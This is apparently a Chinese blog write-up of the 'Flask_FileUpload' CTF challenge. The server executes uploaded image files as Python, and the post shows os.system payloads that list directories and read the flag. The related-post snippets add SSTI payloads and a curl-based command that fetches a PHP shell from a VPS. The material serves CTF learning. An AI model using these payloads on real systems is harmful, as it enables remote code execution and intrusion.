CTF-Flask_FileUpload-wp

最新推荐文章于 2024-09-23 15:08:14 发布
最新推荐文章于 2024-09-23 15:08:14 发布
阅读量197 收藏
点赞数
文章标签: flask python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70303095/article/details/133820511
版权

CTF-Flask_FileUpload

我觉得这道题很有意思,简单记录一下

  1. 进入题目
    请添加图片描述

    直接上传文件

  2. 根据提示,猜测可能是SSTI注入,直接在文件里边写入一个模板看是否会被执行

    请添加图片描述

    上传,查看返回包,可以明显的看出被执行,已经确定是SSTI注入了

    请添加图片描述

  3. 到这一步按照老规矩就是直接上payload了,我直接拿出我珍藏的payload

    以为一切顺利,结果全部失败,绕过也不行。

    到了日常emm时间,自我怀疑我是不是废物

    请添加图片描述

  4. 求助大佬poc

    import os 
os.system('cat /flag')

    看第一眼还没反应过来,这是什么poc直到我把poc写进图片里就明白了,这不就是把我前端上传的文件当作py文件来执行了吗

    要是没看明白,那我们在图片里边输入打印的代码吧

    print("数声风笛离亭晚,\n君向潇湘我向秦。")

    请添加图片描述

  5. 开始起飞

    //查看当前文件是否有flag
import os 
os.system('ls')

//没找到继续找
import os 
os.system('ls ../')

//找i到了查看
import os 
os.system('cat ../flag')

    请添加图片描述

W.167
关注
CTF之路:Flask_FileUpload文件上传漏洞利用、关于os.system()与更强大的os.popen()
zw05011的博客
01-08 3978
1.题目 BP上分析数据包,发现有提示: Give me the file, and I will return the Running results by python to you! 意思是:上传一个文件,系统将用python运行它,并返回结果 经验告诉我们,上传的文件里应该含有python可执行代码。 知识点 os.system()函数实现在程序中执行命令行命令 解题分析 上传文件发现似乎只能上传图片 这也没关系,可以把文件重命名为.png/jpg 打开一个file,写入代码 import os
RootersCTF2019 I ♥ Flask
汗的博客
08-29 523
知识点 url参数爆破、ssti 信息收集 看了别人的wp,才知道http参数这方面的信息收集 这里使用arjun,当然也可以万能的burpsuite python3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get 得到参数name 改成/?name={{3*3}} 利用和get flag 获取当前目录下文件列表 xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').
bugku Flask_FileUpload wp(小宇特详解)
小宇的web博客
06-17 232
bugku Flask_FileUpload wp(小宇特详解) 1.这里先分析一下源码。 这里只能提交jpg和png,而且是用python来运行的 2.这里先创建一个记事本,写入下面的代码 3.修改后缀为jpg后,上传,分析源码
基于flask常见trick——unicode&进制编码绕过
最新发布
2401_83799022的博客
09-23 939
其出题方便,经常能在CTF比赛中见到,常见题型有debug模式算pin码、ssti、原型链污染等,其中后两者属于通用漏洞,且在flask框架下有比较成体系的利用方式。而json.loads频繁出现在前后端交互中,如果后端的waf在json.loads之前就对流量监测,则存在unicode编码bypass的空间。而init被blacklist过滤了,幸运的是check是在json.loads之前执行的,可以用unicode编码绕过。并且flag.html不是正常的渲染格式{},所以也要污染掉模板字符串。
CTFFlask_FileUpload
qq_74263993的博客
04-05 317
查看源码,发现注释告诉我们会运行python的文件,但是系统只能上传图片格式(这个是自己尝试知道的)上传查看源码得到 flag{c6d732debc82421a5e7aba831765e915}那我们就写一个python代码改成jpg或者png格式的文件。拿到题目就一个上传文件的网页。
CTFflask SSTI的研究
qq_46266956的博客
10-14 601
...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
libbabeltrace-ctf-dev_1.5.6-2+deb10u1_all.deb
11-11
统信UOS资源包
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
CTF-shell_exec-Wp
qq_28545703的博客
10-29 1517
CTF-shell_exec-Wp 题目是这样的,ping命令测试 查看html源代码看到一个tip 解题过程一 经过大量测试目的其实就是执行cat /flag 但是发现有过滤了空格,这里我们$IFS$9代替 我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php 最终poc: #第一条,把vps的<?php system('cat /flag')>写进去a `echo$IFS$9curl$IFS$9112h
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
对一道ctf赛题的详细分析
蚁景网安学院
11-23 877
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客极客技术、信息安全热点安全研究分析等安全相关的技术文章稿件通过并发布还能收获200-800元不等的稿酬0x0...
CTF赛题分析之 Flask 目录穿越
baimao__Ch的博客
04-25 978
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
BUUCTF [RootersCTF2019] I_<3_Flask
Senimo
12-19 1324
BUUCTF [RootersCTF2019] I_<3_Flask 考点: Jinjia2模版注入 Arjun参数爆破工具 tplmap模版注入工具 启动环境: 一道Flask题目,大概率为模版注入,先用Arjun工具对可利用传参进行爆破: python3 arjun.py -u http://xxx.node3.buuoj.cn/ -m GET -c 200 得到参数名:name 尝试传入值:?name=1 页面发生了变化,传参被成功执行,尝试模版注入: ?name={{2*2}}
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5905
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入。
CTF-web 第七部分 flask模板注入 沙箱逃逸
iamsongyu的博客
10-17 8886
1 注入原理 Flaskpython语言编写的轻量级的MVC (也可以称为MTV, T: Template)框架具体详见http://docs.jinkan.org/docs/flask/  对于Flask 框架本身,本文不做讨论。   我们看一下测试代码中的 hello_ssti函数 【功能 打印 hello + 用户传入的name值】 函数中模板内容  template = ''...
ODPS FileUploadSample
小虫
10-23 614
话不多说  直接一点 package com.alibaba.odps.tunnel.samples; import java.io.BufferedReader; import java.io.FileInputStream; import java.io.IOException; import java.io.InputStreamReader; import java.tex
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值